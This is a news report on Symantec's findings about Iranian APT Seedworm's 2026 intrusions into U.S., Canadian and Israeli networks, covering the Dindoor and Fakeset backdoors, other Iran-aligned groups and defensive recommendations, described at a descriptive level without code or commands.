Symantec researchers identified cyber activity linked to the Iranian advanced persistent threat group Seedworm across the networks of several U.S. organizations, with intrusions beginning in early February 2026 and continuing in recent days. The activity has affected a range of sectors, including a U.S. bank, an airport, non-governmental organizations in the U.S. and Canada, and the Israeli operations of a U.S. software company that supplies the defense and aerospace industries.
The campaign has emerged amid escalating regional tensions following U.S. and Israeli military strikes on Iran, raising concerns that Iran-aligned cyber actors may be expanding reconnaissance and access operations against Western organizations. Security analysts warn that the activity signals a broader effort to establish footholds in strategically relevant networks, and they advise organizations to increase monitoring and defensive readiness as Iranian threat groups may continue probing targets in the coming weeks.
“Seedworm is a long-standing Iranian threat group, which usually mounts classic espionage attacks for the purposes of spying and information gathering,” according to a Thursday post by the Symantec and Carbon Black Threat Hunter team. “Active since 2017, CISA has said that Seedworm is ‘a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).’ Seedworm originally focused on victims in the Middle East but later broadened its scope to target telecommunications, defense, local government, and oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own custom malware as well as using dual-use and living off the land tools.”
The team added that “Given the current escalations between the U.S. and Iran, it is likely that CNI is at high risk of attack, as well as organizations supporting these entities. Organizations with exposed terminal operating systems, schedules and trucking/rail interfaces may be targeted, as well as passenger processing systems, baggage systems, and contractor networks. Additionally, given the high risk, other organizations that operate within sectors such as energy/fuel supply chains may be targets.”
Researchers identified a previously unknown backdoor, which they named Dindoor, on the network of the Israeli branch of the targeted software company. The same backdoor was also detected on the networks of a U.S. bank and a Canadian non-profit organization. Dindoor leverages Deno, a secure runtime environment for JavaScript and TypeScript, to execute its payload and was digitally signed with a certificate issued to ‘Amy Cherne.’
Investigators also observed an attempted data exfiltration from the software company using Rclone, a command line tool often abused to move data to cloud storage. The transfer appeared to target a Wasabi cloud storage bucket, though it remains unclear whether the exfiltration was successful.
A separate Python-based backdoor, called Fakeset, was discovered on the networks of a U.S. airport and a non-profit organization. This malware was signed with certificates issued to ‘Amy Cherne’ and ‘Donald Gay.’ The Donald Gay certificate has previously been used to sign malware linked to the Seedworm group. The backdoor was downloaded from two servers hosted by Backblaze cloud storage.
The same Donald Gay certificate was also used to sign samples from a malware family known as Stagecomp, which is designed to deploy the Darkcomp backdoor. Both Stagecomp and Darkcomp have previously been attributed to Seedworm by security vendors, including Google, Microsoft, and Kaspersky. Although these specific malware families were not observed in the recent intrusions, the reuse of the same signing certificates strongly suggests that the activity targeting the U.S. organizations is linked to the Seedworm threat actor.
While it remains unclear whether Seedworm’s operations have been disrupted by the current regional conflict, the group’s existing footholds in U.S. and Israeli networks before the escalation place it in a potentially dangerous position to launch further attacks. Although some of the identified breaches have been contained, researchers warn that other organizations could still face exposure if similar access remains undetected.
Symantec assessed that critical infrastructure organizations and companies supporting military logistics could face cyberattacks aimed at compromising several key systems. These include operational technology interfaces, scheduling and logistics platforms, contractor networks, and remote management systems that control or support infrastructure operations.
Security teams are advised to closely monitor for abnormal access to industrial control systems, unexpected remote connections to operational networks, authentication attempts targeting infrastructure management platforms, and unusual configuration changes in critical systems. Increased scrutiny of vendor access and contractor networks is also recommended.
At a minimum, organizations should implement strong network segmentation across operational technology environments and restrict remote access to infrastructure systems. They should also closely monitor contractor VPN access and maintain offline backups of critical configuration systems to ensure resilience in the event of a compromise.
Recent activity from Iran-aligned cyber groups highlights a mix of hacktivism, espionage, and disruptive operations targeting Israel, the United States, and regional organizations. The Iranian-aligned hacktivist group Handala has conducted attacks since at least 2024 against Israeli organizations and entities perceived to support Israel. Its operations include phishing, data theft, ransomware, extortion, and destructive attacks using custom wipers, with stolen data often published on a dedicated leak site. The group has also promoted its activity on Telegram and X.
In late 2025 and early 2026, Handala claimed several high-profile breaches, including alleged compromises involving Israeli officials, a major Israeli healthcare network, and energy sector companies such as Sharjah National Oil Corporation and Israel Opportunity Energy. Some claims, including an alleged breach of Saudi Aramco, appear exaggerated or based on previously circulating data, suggesting potential information or psychological operations aimed at generating attention and reputational damage.
Iranian APT group Seedworm has also continued espionage-focused operations. In October 2025, the group launched a spear phishing campaign using a compromised mailbox to distribute a custom backdoor known as Phoenix to more than 100 government entities and international organizations across the Middle East and North Africa. The campaign relied on malicious Office attachments and infrastructure hosting remote access tools and credential stealers to enable persistent access and intelligence collection. In a separate campaign between June and August 2025, the group targeted academics and foreign policy experts, impersonating a senior researcher from the Brookings Institution to deliver malicious links and remote access payloads.
Other Iranian-linked actors have conducted reconnaissance and disruptive activity as well. The group Marshtreader, associated with Iran’s Ministry of Intelligence and Security, was observed in June 2025 scanning Israeli networks for vulnerable cameras, likely to support intelligence gathering and potential targeting during the regional conflict.
Additional attacks included password spraying against Israeli municipal government entities and spear phishing campaigns designed to deliver remote access tools. Meanwhile, the pro-Palestine hacktivist group DieNet launched high-volume distributed denial of service attacks against U.S. critical infrastructure sectors, including energy, finance, healthcare, and transportation, using amplification techniques and DDoS as a service infrastructure to disrupt operations.
Researchers warn that Iranian cyber actors are likely to launch a mix of disruptive and covert campaigns in the near term. These operations may combine highly visible actions such as distributed denial of service attacks, website defacements, and data leak claims with quieter efforts to gain long term access to targeted networks. The goal would be both political signaling and the creation of strategic leverage against critical sectors.
Defenders should expect increased activity targeting government, transportation, energy, defense contractors, and related supply chains. Tactics will likely include DDoS attacks, credential harvesting, password spraying, and mailbox compromises to gain initial access and intelligence. Hacktivist groups may also amplify pressure through leak sites and intimidation campaigns, even when the underlying breaches are limited, using these claims to create psychological and reputational impact.
